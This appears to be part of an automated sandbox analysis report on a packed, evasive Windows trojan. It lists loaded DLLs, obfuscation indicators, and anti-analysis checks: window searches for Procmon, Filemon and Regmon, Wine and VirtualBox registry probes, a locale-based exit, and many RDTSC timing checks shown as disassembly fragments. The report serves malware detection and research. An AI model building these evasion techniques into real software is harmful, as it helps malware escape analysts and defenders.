              Source: file.exeStatic PE information: Section: rkukuayu ZLIB complexity 0.9949271222014925
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_000C3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_000BCAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\UX592F00.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1821184 > 1048576
              Source: file.exeStatic PE information: Raw size of rkukuayu is bigger than: 0x100000 < 0x1a2c00

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rkukuayu:EW;uvxbkdjf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rkukuayu:EW;uvxbkdjf:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000C6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c327e should be: 0x1bddd3
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: rkukuayu
              Source: file.exeStatic PE information: section name: uvxbkdjf
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00314025 push 72908968h; mov dword ptr [esp], eax0_2_0031404F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00314025 push edx; mov dword ptr [esp], eax0_2_00314083
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00314025 push ebp; mov dword ptr [esp], eax0_2_00314091
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00314025 push edx; mov dword ptr [esp], ebp0_2_003140D9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EC865 push 6AE8367Ah; mov dword ptr [esp], edx0_2_004EC889
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047E868 push eax; mov dword ptr [esp], 3BF5FA94h0_2_0047EA94
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046B87B push 57FFB460h; mov dword ptr [esp], ecx0_2_0046B8BB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046B87B push 187F613Dh; mov dword ptr [esp], edi0_2_0046B8DB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049B800 push eax; mov dword ptr [esp], ebx0_2_0049B81F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00564803 push 2DE4992Ah; mov dword ptr [esp], ebx0_2_00564865
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041F02F push edx; mov dword ptr [esp], ebp0_2_0041F08F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041F02F push esi; mov dword ptr [esp], ecx0_2_0041F14E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FA83E push 61A3D531h; mov dword ptr [esp], edi0_2_004FA86A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FA83E push edi; mov dword ptr [esp], ecx0_2_004FA883
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046F8C8 push ebp; mov dword ptr [esp], eax0_2_0046FBA9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C7895 push ecx; ret 0_2_000C78A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00309095 push 2C7DCF00h; mov dword ptr [esp], edi0_2_00309130
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00309095 push 3F0F32F7h; mov dword ptr [esp], edi0_2_00309215
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404095 push 3C4BED4Fh; mov dword ptr [esp], ecx0_2_00404126
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404095 push 3384DCF4h; mov dword ptr [esp], edx0_2_0040412E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D60BD push 10E66431h; mov dword ptr [esp], edi0_2_004D613D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003730CA push 7709C460h; mov dword ptr [esp], ebx0_2_003730F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003730CA push 57EC1B08h; mov dword ptr [esp], eax0_2_0037316C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C951 push ebp; mov dword ptr [esp], esp0_2_0045C95F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C951 push esi; mov dword ptr [esp], 1904DB98h0_2_0045C9DE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C951 push 35B5AD9Ch; mov dword ptr [esp], esi0_2_0045CA4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C951 push esi; mov dword ptr [esp], 19D2A7D1h0_2_0045CA9F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C951 push esi; mov dword ptr [esp], ebp0_2_0045CAAA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C951 push 33A5D37Fh; mov dword ptr [esp], esi0_2_0045CB1D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C951 push 5E5BDFCBh; mov dword ptr [esp], eax0_2_0045CB48
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045C951 push 1383EC70h; mov dword ptr [esp], edx0_2_0045CB71
              Source: file.exeStatic PE information: section name: rkukuayu entropy: 7.955051436363669

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000C6390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25897
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F0409 second address: 2F040F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46C37D second address: 46C39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jbe 00007FB560CBB80Bh 0x0000000d jmp 00007FB560CBB7FFh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46ED04 second address: 46ED0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB560E14C36h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46ED0F second address: 46ED19 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB560CBB7FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46EE23 second address: 46EE28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4808D1 second address: 4808D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D6C1 second address: 48D6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FB560E14C36h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D6D2 second address: 48D6D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D9C2 second address: 48D9E5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560E14C36h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FB560E14C41h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D9E5 second address: 48D9EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D9EA second address: 48D9F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48DB88 second address: 48DB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48DE8A second address: 48DE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48DE8E second address: 48DE92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48DE92 second address: 48DE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48DE98 second address: 48DE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48DE9E second address: 48DEC2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB560E14C3Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jne 00007FB560E14C36h 0x00000013 pop esi 0x00000014 jbe 00007FB560E14C38h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48DEC2 second address: 48DEC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48DEC7 second address: 48DED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007FB560E14C36h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E1A0 second address: 48E1A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E1A6 second address: 48E1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E459 second address: 48E467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E467 second address: 48E4A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 ja 00007FB560E14C56h 0x0000000f jmp 00007FB560E14C3Dh 0x00000014 jmp 00007FB560E14C43h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jl 00007FB560E14C36h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E4A1 second address: 48E4B6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FB560CBB7FFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48E4B6 second address: 48E4C5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB560E14C3Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482320 second address: 48232A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB560CBB7F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48232A second address: 482335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F2B6 second address: 48F2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB560CBB7FAh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F2C7 second address: 48F2CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F59F second address: 48F5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496445 second address: 496449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496449 second address: 49644F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49644F second address: 496455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496455 second address: 496459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495937 second address: 495941 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB560E14C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495941 second address: 495951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB560E658CCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496AF7 second address: 496AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496AFC second address: 496B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496B02 second address: 496B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496B06 second address: 496B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E658D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FB560E658CCh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496B2F second address: 496B44 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c je 00007FB560E1BD5Eh 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 498AB9 second address: 498ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 453BBC second address: 453BE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E1BD5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FB560E1BD5Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 453BE1 second address: 453BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB560E658C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 453BEB second address: 453C0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E1BD69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 453C0F second address: 453C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 453C13 second address: 453C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB560E1BD66h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 457182 second address: 457188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49BBB7 second address: 49BBCE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB560E1BD62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49BD1F second address: 49BD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49BD27 second address: 49BD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB560E1BD56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49BFF2 second address: 49BFF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C312 second address: 49C31C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB560E1BD56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C31C second address: 49C327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C327 second address: 49C338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB560E1BD56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E06C second address: 49E070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E162 second address: 49E166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E4DC second address: 49E4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E4E1 second address: 49E4E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E4E7 second address: 49E4EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E4EB second address: 49E4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E6F0 second address: 49E6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E6F4 second address: 49E6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49ED57 second address: 49ED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB560E658D4h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1E3 second address: 49F1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1E7 second address: 49F206 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB560E658C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e stc 0x0000000f xchg eax, ebx 0x00000010 jl 00007FB560E658CAh 0x00000016 push esi 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a push eax 0x0000001b pushad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F206 second address: 49F20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F20C second address: 49F215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F677 second address: 49F690 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jno 00007FB560E1BD5Ch 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
